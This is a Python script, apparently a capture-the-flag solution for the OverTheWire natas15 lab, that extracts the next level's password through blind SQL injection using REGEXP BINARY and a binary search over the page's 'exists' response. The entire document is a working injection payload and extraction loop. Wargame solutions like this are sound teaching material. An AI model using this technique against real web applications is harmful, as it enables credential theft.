http://natas15.natas.labs.overthewire.org/

regex_password_cracker.py

import requests
import math
import string

SQL_INJECTION = 'natas16" AND password REGEXP BINARY "^%s$"; -- '

auth = ('natas15', '__CENSORED__')
characters = string.ascii_lowercase + string.ascii_uppercase + string.digits
total_characters = len(characters)
password_length = 32
matching = ''

while len(matching) < password_length:
  remaining_length = password_length - len(matching)
  chars_start = 0
  chars_end = total_characters
  matching_char = ''
  while not matching_char:
    midpoint = int(math.ceil((chars_end + chars_start) / 2.0))
    chars_to_try = characters[chars_start:midpoint]
    password_regex = '%s[%s][a-zA-Z0-9]{%i}' % (matching, chars_to_try, remaining_length - 1)
    print '%s %i-%i (%i)' % (chars_to_try, chars_start, midpoint, chars_end)
    print password_regex
    r = requests.post('http://natas15.natas.labs.overthewire.org/index.php', auth=auth, data={'username': SQL_INJECTION % password_regex })
    if 'exists' in r.text:
      if (midpoint - chars_start) <= 1:
        matching_char = characters[chars_start]
      chars_end = midpoint
    else:
      if (midpoint - chars_start) <= 1:
        matching_char = characters[chars_start+1]
      chars_start = midpoint
  matching = matching + matching_char
  print 'found: %s' % (matching_char)
print 'found password: %s' % matching